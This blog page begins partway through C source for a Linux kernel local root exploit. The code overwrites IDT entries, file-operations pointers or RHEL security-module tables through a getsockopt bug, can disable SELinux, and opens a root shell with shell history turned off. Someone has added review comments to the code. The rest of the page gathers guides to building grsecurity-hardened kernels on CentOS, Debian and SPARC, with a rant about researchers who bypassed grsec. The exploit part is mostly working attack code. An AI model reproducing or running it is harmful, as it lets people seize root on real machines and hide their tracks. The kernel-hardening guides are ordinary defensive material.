      __pppp_tegddewyfg("chose attack vector F0Ps\n");
    }
  }
  if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) {// try lsm(rhel)
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target) {
       __pppp_tegddewyfg("u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n");
    }
    else
      uselsm=1;
  }
  if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
    // -i flag
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg("Un4lb3 t0 f1nd t4rg3t: c0ntinu3ing w1th0ut s3linsux d1s4bl3d.\n");
       flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }
  if(!usefops && !useidt && !uselsm)
  __yyy_tegdtfsrer("3v3ryth3ng f41l3d!! try an0th3r sploit\n");
}

/*
 * Compute the optlen value used for a given kernel address: the 32-bit
 * sum (stack + 8) minus addr minus 16, evaluated in 64-bit unsigned
 * arithmetic and narrowed to int, exactly as the original expression
 * `8 + stack - addr - 16` does (including the 32-bit wrap of stack + 8).
 *
 * addr:  64-bit kernel address the caller wants to reach.
 * stack: 32-bit fake stack top (Y0Y0STOP at every call site).
 */
static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack) {
  __dgdhdytrg55 top = stack + 8;                         /* wraps at 32 bits */
  __yyrhdgdtfs66ytgetrfd len = (__yyrhdgdtfs66ytgetrfd)top - addr - 16;
  return (int)len;
}

/* Argument block passed to bitch_call(); populated by fillsocketcallAT(). */
static struct socketcallAT at;
/* The four 32-bit words idt_smash() writes, one per call, over the 16
 * bytes of the IDT entry it is given. */
static __dgdhdytrg55 idtover[4] =
             {0x00100000UL,
              0x0020ee00UL,
              0x00000000UL,
              0x00000000UL};

/*
 * Populate the global argument block `at` from the global socket `s`:
 * level SOL_IP, option MCAST_MSFILTER, optval = buffer, optlen = &magiclen.
 * bitch_call() later hands this block to socketcall number 0xf.
 */
static void fillsocketcallAT(void) {
  at = (struct socketcallAT){
    .s       = s,
    .level   = SOL_IP,
    .optname = MCAST_MSFILTER,
    .optval  = buffer,
    .optlen  = &magiclen,
  };
}

/*
 * Enter the kernel through the 32-bit `int $0x80` gate with eax = 0x66
 * (socketcall) and ebx = 0xf (the getsockopt sub-call; the argument block
 * carries a socklen_t * as its last field, matching that signature), ecx
 * pointing at `at`, and the user stack pointer temporarily switched to
 * `stack` (Y0Y0STOP at every call site). The original esp is kept in esi
 * and restored afterwards, together with ebx/esi/ecx/edx.
 *
 * at:    argument block (this parameter shadows the file-scope `at`).
 * stack: address installed in esp for the duration of the syscall.
 *
 * NOTE(review): edx is pushed/popped but not listed as a clobber; since
 * it is restored that is consistent, but the compiler is not told esp
 * changes during the statement either.
 */
static void bitch_call(struct socketcallAT *at, void *stack) {
  asm volatile(
      "push %%ebx\t\n"
      "push %%esi\t\n"
      "push %%ecx\t\n"
      "push %%edx\t\n"
      "movl $0x66, %%eax\t\n"
      "movl $0xf, %%ebx\t\n"
      "movl %%esp, %%esi\t\n"
      "movl %0, %%ecx\t\n"
      "movl %1, %%esp\t\n"
      "int $0x80\t\n"
      "movl %%esi, %%esp\t\n"
      "pop %%edx\t\n"
      "pop %%ecx\t\n"
      "pop %%esi\t\n"
      "pop %%ebx\t\n"
      :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
     );
}

/*
 * Fill `buffer` with `value` repeated as 32-bit words.
 *
 * NOTE(review): the element count is sizeof(buffer)/sizeof(void*) while the
 * elements written are unsigned int; both are 4 bytes in this i386 build,
 * so the whole buffer is covered, but the two sizes would diverge on a
 * 64-bit build. `i` is a signed int compared against a size_t.
 */
static void __setmcbuffer(__dgdhdytrg55 value) {
  int i;
  __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
  for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
    *(p+i) = value;
}

/*
 * Issue four calls through bitch_call(), each with `buffer` filled with
 * idtover[i] and magiclen aimed (via get_socklen) at idtbase + 4*i, i.e.
 * at the four consecutive dwords of the 16-byte IDT entry whose address the
 * caller passes (main() passes entry 0xdd).
 *
 * idtbase: 64-bit address of the IDT entry to overwrite.
 */
static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase) {
  int i;
  __dgdhdytrg55 curr;
  for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) {
    curr = idtover[i];
    __setmcbuffer(curr);
    magiclen =  get_socklen(idtbase + (i*4), Y0Y0STOP);
    bitch_call(&at, (void*)Y0Y0STOP);
  }
}

/*
 * Map one anonymous read/write page at the fixed address Y0Y0SMAP. Its
 * top (Y0Y0STOP) is the stack pointer bitch_call() switches to. Exits via
 * perror("mmap") if the fixed mapping is refused.
 */
static void y0y0stack(void) {
  const int prot = PROT_READ | PROT_WRITE;
  const int mflags = MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED;
  void *page = mmap((void *)Y0Y0SMAP, PAGE_SIZE, prot, mflags, -1, 0);
  if (page == MAP_FAILED)
    __xxxfdgftr_hshsgdt("mmap");
}

/*
 * Map one anonymous page at the fixed address Y0Y0CMAP; main() copies the
 * payload bytes into it (J0J0S and J0J0R00T both lie inside this page).
 * TRY_REMAP_DEFAULT is defined above, so the page is mapped RW only and
 * main() later makes it executable through rey0y0code(); the RWX variant
 * is compiled out. Exits via perror("mmap") on failure.
 */
static void y0y0code() {
void* map = mmap((void*)Y0Y0CMAP,PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
PROT_READ|PROT_WRITE,
#else
PROT_READ|PROT_WRITE|PROT_EXEC,
#endif
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}

/*
 * Turn the RW page at `old` into a read/execute mapping: dump the page's
 * contents to a file named "__tmpfile" in the current working directory,
 * unmap the page, and map the file back at the same fixed address with
 * PROT_READ|PROT_EXEC. The file is unlinked again on success.
 *
 * old: address of the page to remap (main() passes Y0Y0CMAP).
 *
 * Returns -1 if the file cannot be created, or munmap/mmap fails;
 * otherwise the first byte of the remapped page, read through a plain
 * `char`. NOTE(review): a page whose first byte is >= 0x80 therefore
 * returns a negative value and the caller's `< 0` check treats a
 * successful remap as failure.
 *
 * NOTE(review): getcwd() and write() results are unchecked; strcat() onto
 * cwd[1024] is unbounded for long working directories; fd is never
 * closed; on the munmap/mmap failure paths the dump file is left behind.
 * The transient "__tmpfile" in the working directory (holding the page
 * image) is an on-disk artifact of this code path.
 */
static int rey0y0code(unsigned long old) {
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];
  getcwd(cwd, sizeof(cwd));
  strcat(cwd, "/__tmpfile");
  unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd < 0)
    return -1;
  write(fd, (const void*)old, PAGE_SIZE);
  if(munmap((void*)old, PAGE_SIZE) < 0)
    return -1;
  map = mmap((void*)old,PAGE_SIZE,PROT_READ|PROT_EXEC,MAP_PRIVATE|MAP_FIXED,fd,0);
  if(map == MAP_FAILED)
  return -1;
  wizard = *((char*)old);
  unlink(cwd);
  return wizard;
}

/*
 * Entry point. Sequence:
 *   1. env_prepare() probes the host, parses options and picks a vector.
 *   2. y0y0stack()/y0y0code() create the two fixed pages.
 *   3. The first-stage payload for the chosen vector gets J0J0R00T patched
 *      in (plus the SELinux bytes when requested) and is copied to J0J0S;
 *      the second stage (cred payload, or the uid-patched standard one) is
 *      copied to J0J0R00T.
 *   4. A UDP socket is created and the argument block filled; the code
 *      page is remapped executable.
 *   5. Vector-specific trigger: IDT (overwrite entry 0xdd, then `int $0xdd`),
 *      fops (one call aimed at _m_fops, then poll() on /proc/timer_list),
 *      or LSM (six calls aimed at the three RHEL ops tables, then a
 *      msgget/msgctl pair as the trigger).
 *   6. If getuid() is now 0, fork and exec /bin/sh -i with an environment
 *      that disables shell history and sets a fixed PATH; otherwise report
 *      failure.
 *
 * NOTE(review): the post above alleges this code "binds a port". In the
 * visible C there is no bind()/listen()/connect(); the AF_INET socket is
 * used only as the object of the socketcall. Any such behaviour would have
 * to live in the undecoded payload bytes, which this review does not
 * disassemble, so the claim is neither confirmed nor refuted here.
 * NOTE(review): `fd` on the fops path is never closed; `idtb` is only
 * assigned on the IDT path and only read there.
 */
int main(int argc, char*argv[]) {
  int uid,fd;
  __yyrhdgdtfs66ytgetrfd *patch, idtb;
  struct pollfd pfd;
  printf(BANNER);
  uid = getuid();
  env_prepare(argc, argv);
  y0y0stack();
  y0y0code();
  if(useidt) {
    idtb = getidt();
    __gggdfstsgdt_dddex("b4s3 addr3ss: %llx\n", idtb);
    __pppp_tegddewyfg("Bu1ld1ng r1ng0 sh3llc0de - IDT\n");
    /* unaligned 8-byte store into the placeholder at offset 14 */
    patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __pppp_tegddewyfg("Prepare: m0rn1ng w0rk0ut\n");
    if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) {
      __pppp_tegddewyfg("add1ng sp3c14l c0de t0 rem0v3 s3linux\n");
      p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
  } else if(usefops || uselsm) {
    __pppp_tegddewyfg("Bu1ld1ng r1ng0 sh3llc0d3 - F0PZzzZzZZ/LSD(M)\n");
    patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __setmcbuffer(J0J0S);
    __pppp_tegddewyfg("Prepare: m0rn1ng w0rk0ut\n");
    /* -s only takes effect on the LSM path; curr_target may be NULL otherwise */
    if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
    __pppp_tegddewyfg("add1ng sp3c14l c0de t0 rem0v3 s3linux\n");
    p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
  }
  if(flags & KERN_DGGDYDTEGGETFDRLAK) {
    __pppp_tegddewyfg("Us1ng cr3d s3ash3llc0d3z\n");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  } else {
    __pppp_tegddewyfg("Us1ng st4nd4rd s3ash3llz\n");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    /* caller's uid written over the 4-byte placeholder at R0C_0FF */
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
  }
  __pppp_tegddewyfg("0p3n1ng th3 m4giq p0rt\n");
  s = socket(AF_INET, SOCK_DGRAM, 0);
  if(s < 0)
  __xxxfdgftr_hshsgdt("socket");
  fillsocketcallAT();
#ifdef TRY_REMAP_DEFAULT
  /* TRY_REMAP_DEFAULT is defined above, so this remap always runs */
  if(rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("Un4bl3 t0 r3m4p sh1t\t\n");
#endif
  if(useidt) {
    /* 16-byte IDT entries: entry 0xdd sits at base + 16 * 0xdd */
    __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
    __gggdfstsgdt_dddex("Us1ng 1dt 3ntry: %d\n", 0xdd);
    idt_smash((idtentry));
    sleep(1);
    asm volatile("int $0xdd\t\n");
  } else if(usefops) {
    magiclen = get_socklen(_m_fops, Y0Y0STOP);
    magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
    __gggdfstsgdt_dddex("m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen);
    __pppp_tegddewyfg("Killin f0ps\n");
    bitch_call(&at, (void*)Y0Y0STOP);
    sleep(1);
    fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
    if(fd < 0)
    __xxxfdgftr_hshsgdt("fuq t1m3r_l1st");
    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0);
  } else if(uselsm) {
    int msqid;
    /* slot RHEL_LSM_OFF (8-byte pointers) of each ops table */
    __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd dummy_msg_off   = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
    /* IPC_PRIVATE is 0, so OR-ing it into the flags is a no-op */
    msqid = msgget(0, IPC_PRIVATE|0600);
    if(msqid < 0)
      __xxxfdgftr_hshsgdt("fuq!");
    /* for each table: low dword <- J0J0S, high dword <- 0 */
    magiclen =  get_socklen(selinux_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it here
  }
  munmap((void*)Y0Y0CMAP, PAGE_SIZE);
  if(getuid() == 0) {
    pid_t pid;
    __pppp_tegddewyfg("[!] got root\n");
    pid = fork();
    if(pid == 0)
    {
      /* child: interactive shell with history disabled and a fixed PATH */
      char *args[] = {"/bin/sh", "-i", NULL};
      char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", 

"HISTFILESIZE=0","PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
      execve("/bin/sh", args, envp);
    } else {
      int status;
      waitpid(pid, &status, 0);
    }
  }
  else
    __pppp_tegddewyfg("[-] exploit failed!\n");
  close(s);
  return 0;
}

….thankgod the nightmare is over…

Building a GRSEC Kernel (3-4 ways)..

Posted on 29th September 2011 in Codes, Papers

I initially had this done, with my OWN shell box, on one kernel, but i cannot find it, i did find an exact same application of it though, so i am putting a few together and, here is the result..
Note , there is a few different things shown here, ultimately, you want to have a kernel thats on a nice medium-sec or high
setting.
There is links and refs added to 3 different GOOD guides, and i had my own, wich was a walkthrough of me actually setting up a box with it on a 2.4.8 or so kernel,yes abit old but patches are better at this level.
You also must take heed that grsec CAN be bypassed, if someone REALLLLY wants your box, and it is not running the proper versions, you may have problems.. there is abit more about this regarding grsec and also regarding ACl-Bypass i have found on my own , which break the chroot() and break a ‘gorilla-grsec’ 2.6.18 kernel..but, now grsec has another attacker,Dan
Rosenwhatever and Jon.O have attacked Spender, the prix have used a shitty little bug wich was more like,they studied and
dissected grsec for solong, and still posted a failed PoC online, theyre StackJacking, is a friggen joke, wether they cripple it on purpose, or theyre just idiots, but, i know for fact Spender knew of some bugs, and was already working on BETTER patches, them two pricks used some conversations re grsec kernel, to basically attack it.. so from a friendly chat, to bang hitting the grsec framework,and, not just once oh no…the DJBliss idiot,even tried to create a small ‘backdoor’ for SOME users,trying to trick Spender, but sorry, spender knowz the codez… better than you two every ever will. You used chater and friendliness, to launch the attack just to gain some notoriety at a snoggy little security conf,ofc it was patched,but the patch was meant to be better, so in fact, they have kinda ruined some versions of grsec, so, id choose wisely, and, maybe look at a higher 2.6.36+ kernel base to use. this is just my own notes…
cheers,
xd

NOTE: Cheers to the people who did these,Im spewing myn
isnt here,it shows how to apply iptable patch and also, howto use it, but, before you embark,please read ALL the Post..not just abit of it.
Thankyou.
xd

Installing a grsec-patched kernel on a CentOS5 or RHEL5
Here’s my little guide for upgrading a CentOS server to a grsec-patched kernel.
At the time of this writing, this was the latest stable grsec patch available.

Fetch the sources (these can be used universally,
ie: change a few numbers):
wget http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.24.5.tar.bz2
wget http://grsec.linux-kernel.at/grsecurity-2.1.11-2.6.24.5-200804211829.patch.gz

Extract:
tar xjf linux-2.6.24.5.tar.bz2
gzip -d grsecurity-2.1.11-2.6.24.5-200804211829.patch.gz

Patch the kernel:
patch -p0 < grsecurity-2.1.11-2.6.24.5-200804211829.patch
cd linux-2.6.24.5 && make clean && make mrproper

Copy the previous kernel config to use:
cp /boot/config-`uname -r` .config

Edit your kernel:
make menuconfig

Here’s a few of the things I disable (there’s a lot more I could do, but I find the more restrictive I am, the less well things work):
Networking > Amateur Radio support
Networking > IrDA (infrared) support
Networking > Bluetooth subsystem support
Networking > Wireless
Device Drivers > ISDN support
Device Drivers > Telephony support
Device Drivers > Multimedia devices
Device Drivers > Sound

Also, don’t forget to configure the Grsecurity option under Security Options.

Compile your kernel and install it:
make && make modules && make modules_install && make install

Make sure it’s working ok
depmod 2.6.24.5-grsec

Edit /boot/grub/menu.lst with your text editor of choice, add in your kernel:
$EDITOR /boot/grub/menu.lst

Lastly, you reboot:
shutdown -r now

……………….and now a couple different kernels of debian, another popular place for kiddies to run around in… (xd)

DEBIAN (Compile from src):
Compile Debian Kernel with GRSEC — cisc0ninja

Prerequisites:
You have installed the following software/commands:
make, gcc, g++, libncurses5, libncurses5-dev, patch, and there’s probably more but I can’t think of anything right now.
***NOW W/SPARC SUPPORT!!! (see below for details)
PLEASE BE SURE TO MAKE ALL THINGS UP TO DATE AND ASSUMING YOU HAVE ALL APPZ INSTALLED!@ (xd)

This part is for compiling a Debian Linux kernel on x86/amd64 with GRSEC

Step 1:
Download the latest version of Grsecurity and download the latest working stable kernel that goes with it.
(from the 2 links below I put as references) or try:

http://kernel.org/linux-kernel-2.6.24.5.tar.gz

http://grsecurity.net/

Step 2:
Move the 2 compressed files to the directory /usr/src/
Uncompress both files using tar -zxvf for the kernel (example: linux-kernel-2.6.24.5.tar.gz)
and gunzip to turn grsecurity-2.1.11-2.4.36.2-200804211830.patch.gz into grsecurity-2.1.11-2.4.36.2-200804211830.patch
gunzip -d grsecurity-2.1.11-2.4.36.2-200804211830.patch.gz

Step 3:
Patch the kernel source with the grsec code by executing command: patch -p0 < grsecurity-2.1.11-2.4.36.2-200804211830.patch
If you want you can add in the grsec iptables patch as well using the same method.

NOTE: Universal IPtable patch: http://wolfram.schlich.org/linux/misc/kernel/grsecurity/grsecurity-2.2.0-iptables.patch (xd)

Step 4:
Exec the command: make menuconfig
Choose the drivers etc, that you wish to be built into your kernel. Note, do NOT bloat it or it will load too much and clashes will likely occur -xd
You can tell what needs to be built in to your kernel based on a few commands such as lspci, lsmod, etc.

There are some that are dependent on each other for instance:

c@box:/# lsmod
Module Size Used by
thermal_sys 9378 processor, fan, thermal

c@box:/# modinfo thermal
filename: /lib/modules/2.6.32-5-686/kernel/drivers/acpi/thermal.ko
license: GPL
description: ACPI Thermal Zone Driver
author: Paul Diefenbaugh
alias: acpi*:LNXTHERM:*
depends: thermal_sys
vermagic: 2.6.32-5-686 SMP mod_unload modversions 686
parm: act:Disable or override all lowest active trip points. (int)
(etc.. concatenated b/c I'm not going to type all this shit out and you guys get the point)

So in this instance you need to add the thermal module to be built in, as well as select for thermal_sys to be built in.
One may be listed under acpi options and the others may be listed under device drivers generic thermal sysfs driver.

Don't select them to be modules because we're not going to be using an initrd image for this install. If you choose to actually do an initrd image then it's still good to build in the drivers that the system actually needs and just place other drivers as modules.
For instance the system has an intel nic but I think I'll be adding another nic later, probably a 3com so I'll build
in the intel nic and maybe make the 3com a module since I don't have it now but may later.
That is called a modular kernel. If your b0x doesn't boot properly at the end of this it's because you either didn't build in everything you needed or built too many options in and it's nuking itself.
Don't forget to actually configure the options you want in the Grsec and PaX portions of the config
(that's the actual security part of it we're aiming for here)!

Step 5:
Save your config and then type make and press enter.
When that is through type:
make
make modules
make modules_install
make bzImage
and finally make install

***In some cases you may need to also do a make firmware & make firmware_install
Technically if you are building a monolithic kernel and building all the drivers, etc. into the kernel and not compiling anything as modules you can omit the make modules and make modules_install commands but I think you still need to do at least:
make
make bzImage
depmod -a
make install

Step 6:
Update grub with the command: update-grub
But watch out! Sometimes grub has a funny way of reading things!
If your previous line in menu.lst or grub.cfg says:
root=UUID 2345o05te4wtftlk43tjg ro quiet
type the command mount in a normal shell like bash.

If mount is showing root as /dev/sda1 then in your menu.lst file you can say root=/dev/sda1 ro quiet instead of the UUID etc.
Sometimes it needs this instead to boot properly.
The reason is that you can't use UUID's without an initrd image (the UUID's are blkid's that get taken from commands
like mount which happen after the kernel is booted);
so you need to specify the drive and partition such as root=/dev/sda1 or whatever your root partition is.
As well, you also need to change your /etc/fstab to show /dev/sda1 / ext4 defaults 0 1 instead of it saying
UUID=(long number) / ext4 defaults 0 1
NOTE: This needs to be done for all partitions in /etc/fstab.

Step 7:
Reboot into your new Monolithic Debian Linux Kernel complete with Grsec and NO nasty initrd image!

Step 8:
If you are having a hard time getting this to work, you may decide to try with an initrd image.
You can do this by issuing the following command:
update-initramfs -c -k
example:
update-initramfs -c -k 2.6.39.2-grsec

Don't forget that if you decide to use an initrd image you need to add support for it back in to the kernel when you do your

make menuconfig assuming you took it out earlier.
****************************************************************************************************************
This part is for compiling a Debian Linux kernel on SPARC with GRSEC

Most of the information is fairly the same with the exception that when you compile you use this instead:
make clean && make vmlinux image modules modules_install
or
make vmlinux && make image modules modules_install

Then to make it bootable you have to:
cp arch/sparc/boot/image /boot/vmlinux-2.x.x.x-grsec
cp System.map /boot/System.map-2.x.x.x-grsec
cd /boot
rm -rf vmlinuz (which should be a sym link to your old vmlinuz file)
ln -s vmlinuz-2.x.x.x-grsec vmlinuz
vi silo.conf
remove the line initrd=

example silo.conf file:
partition = 1 # Boot partition (= root partition)
root = /dev/sda1 # Root partition
timeout = 150 # Wait 15 seconds before booting the default section
default=Linux
read-write

image=/boot/vmlinuz
label=Linux

image=/boot/vmlinuz-2.x.x.x-old
label=LinuxOLD
initrd=/boot/initrd32.img

//e0f end of paper

Type the command silo and it will check to make sure your silo.conf file is usable.
Then reboot in to your new linux on sparc custom kernel!

Thanks to RaT, Spender, and Dave M. for all your assistance and help with this!
-cisc0ninja

Ref links , use these to get hold of the kernel and patchset you wish to use..remember,you DONT HAVE to use this kernel vers:

http://www.grsecurity.net/

http://www.kernel.org/

http://www.securityfocus.com/infocus/1551

http://www.howtoforge.com/hardening-the-linux-kernel-with-grsecurity-debian

http://vger.kernel.org/~davem/cgi-bin/blog.cgi

http://www.debian.org/doc/manuals/debian-reference/ch09.en.html#_the_kernel

Spender's directory (http://grsecurity.net/~spender/) - includes a quickstart guide to grsecurity.
Grsecurity Config Help (http://grsecurity.net/confighelp.php) - list of all the grsec config options and what they do.

and...a different kernel...

This is based on the same walkthrough posted for grsecurity on redhat based kernels except this is for debian based kernels.
The current stable debian kernel is vuln to about all of the new local exploits and if you are running the 2.4 kernel
you are vuln to even more. Debian even had one of their servers hacked with the local root exploits; they only released
a patched kernel for the testing branch to my knowledge.
Ok so here goes with this debian walkthrough it is rather easy :) (xd)

If you have not done any compiling or built any kernels you must get the packages needed:
sudo apt-get install build-essential bin86 kernel-package
sudo apt-get install libqt3-headers libqt3-mt-dev (needed for make xconfig)

First get what is needed and patch the kernel.

cd /usr/src
wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.17.7.tar.bz2
wget http://grsecurity.org/grsecurity-2.1.9-2.6.17.7-200607261817.patch.gz
tar -xjvf linux-2.6.17.7.tar.bz2
gunzip < grsecurity-2.1.9-2.6.17.7-200607261817.patch.gz | patch -p0
mv linux-2.6.17.7 linux-2.6.17.7-grsec
ln -s linux-2.6.17.7-grsec linux
cd linux

copy your current config over

do uname -r to see what kernel your running and copy it, example:
cp /boot/config-2.6.15-26-686L .config

*Configure the kernel:
sudo make xconfig

if you are doing this on a server use makeconfig make sure you select the basic stuff that is needed,iptables,
your processor type, and then go in Security Options and to grsecurity,select which level of security you want and
any other options you may want.

*In a terminal make sure you are in /usr/src/linux with full root access.
We will build a ".deb" file that can be installed in our Ubuntu system, using make-kpkg.

*In a terminal type:
make-kpkg clean
make-kpkg -initrd --revision=ck2 kernel_image

If there were no errors, this will build the kernel and a ".deb" file will be created in /usr/src.
*To install it:
sudo dpkg -i kernel-image-2.6.17*.deb

Now reboot and if you did everything correctly it should boot back up and you will be using the new grsecurity kernel.

....one more and thatll do it!

I am going to list down those steps that I used to compile my own kernel version 2.4.31 with
grsecurity 2.1.6-2.4.31-200506141150 patch.
This is mainly for Red Hat Linux and will work on version 7.2, 7.3, 8.0 & 9.
I have also used these steps for Fedora Core 1 and CentOS 3.x.
Actually some of these steps can be used for any linux distr0s provided you know what you are doing.

Before you try these steps, you must have some experiences to compile your own kernel from source and have some basic understanding about LILO http://www.google.com.sg/search?hl=en&ie=UTF-8&oe=UTF-8&q=lilo+HOWTO&btnG=Google+Search&meta=
or GRUB http://www.google.com.sg/search?hl=en&ie=UTF-8&oe=UTF-8&q=grub+HOWTO&btnG=Google+Search&meta=

NOTE: Im using LILO as an example here.

It is a good idea that you update your system first using up2date before this. Here is my little up2date HOWTO

http://www.webhostingtalk.com/showthread.php?s=&threadid=227083.

FOLLOW THIS GUIDE AT YOUR OWN RISK AS I AM NOT RESPONSIBLE IN ANY DAMAGES CAUSED! YOU HAVE BEEN WARNED!!!

BEFORE YOU BEGIN
Before we build our custom kernel, you'll need to know what's in your server. Issue the following command as root to get the necessary names of your hardware, their PCI addresses, and their IRQs:
lspci
An example result for one of my server:

00:00.0 Host bridge: Intel Corp.: Unknown device 2578 (rev 02)
00:01.0 PCI bridge: Intel Corp.: Unknown device 2579 (rev 02)
00:03.0 PCI bridge: Intel Corp.: Unknown device 257b (rev 02)
00:1d.0 USB Controller: Intel Corp. 82801EB USB (Hub #1) (rev 02)
00:1d.1 USB Controller: Intel Corp. 82801EB USB (Hub #2) (rev 02)
00:1d.2 USB Controller: Intel Corp. 82801EB USB (Hub #3) (rev 02)
00:1d.3 USB Controller: Intel Corp. 82801EB USB EHCI Controller #2 (rev 02)
00:1d.7 USB Controller: Intel Corp. 82801EB USB EHCI Controller (rev 02)
00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB PCI Bridge (rev c2)
00:1f.0 ISA bridge: Intel Corp. 82801EB ISA Bridge (LPC) (rev 02)
00:1f.1 IDE interface: Intel Corp. 82801EB ICH5 IDE (rev 02)
00:1f.2 RAID bus controller: Intel Corp.: Unknown device 24df (rev 02)
00:1f.3 SMBus: Intel Corp. 82801EB SMBus (rev 02)
02:01.0 Ethernet controller: Intel Corp.: Unknown device 1019
03:06.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27)
03:08.0 Ethernet controller: Intel Corp. 82801EB (ICH5) PRO/100 VE Ethernet Controller (rev 01)
Now you can find more information related to the hardware shown above by issuing the following command:
lspci -s 03:08.0 -vv

The output for the above as below:
03:08.0 Ethernet controller: Intel Corp. 82801EB (ICH5) PRO/100 VE Ethernet Controller (rev 01)
Subsystem: Intel Corp.: Unknown device 342a
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B-
Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium >TAbort- SERR- Latency: 32 (2000ns min, 14000ns max), cache line size 08
Interrupt: pin A routed to IRQ 20
Region 0: Memory at feafe000 (32-bit, non-prefetchable) size=4K
Region 1: I/O ports at bc00 size=64
Capabilities: [dc] Power Management version 2
Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+)
Status: D0 PME-Enable- DSel=0 DScale=2 PME-

You can use lsmod and cat /proc/interrupts to find out more about your current modules etc.
After you have all the necessary information, you can search for it at Google with a query such as linux 82801EB to
know which modules name to use for your hardware.

Ok, here we start...
As root, do the following steps in order:
INSTALL DEPENDENCIES AND PACKAGES
Step 1: Install gcc and all its dependencies packages
We need gcc to compile kernel.
Simply run this command to install gcc and all its dependencies if it is not installed:
up2date gcc
OR if you are using Fedora you can use up2date or yum:
yum install gcc

Step 2: Install ncurses-devel and all its dependencies packages

ncurses-devel package is needed while compiling kernel from source specially for running make menuconfig:
up2date ncurses-devel
OR if you are using Fedora you can use up2date or yum:
yum install ncurses-devel

Step 3: Install patch package
You need the patch package to be installed so that you can use it to patch the kernel source:
up2date patch

OR if you are using Fedora you can use up2date or yum:
yum install patch

Step 1: Change your current working directory
For me, I choose to download the kernel to /usr/local/src but you are free to choose a directory to store and
build/compile your kernel.

cd /usr/local/src
Step 2: Download the latest stable kernel version 2.4.x series which is 2.4.31
wget -c http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.31.tar.bz2
Step 3: Download the grsecurity patch
wget -c http://www.grsecurity.net/grsecurity-2.1.6-2.4.31-200506141150.patch.gz
Step 4: Unpack the kernel source
tar xvfj linux-2.4.31.tar.bz2
Step 5: Patch the kernel source with grsecurity patch
gunzip < grsecurity-2.1.6-2.4.31-200506141150.patch.gz | patch -p0
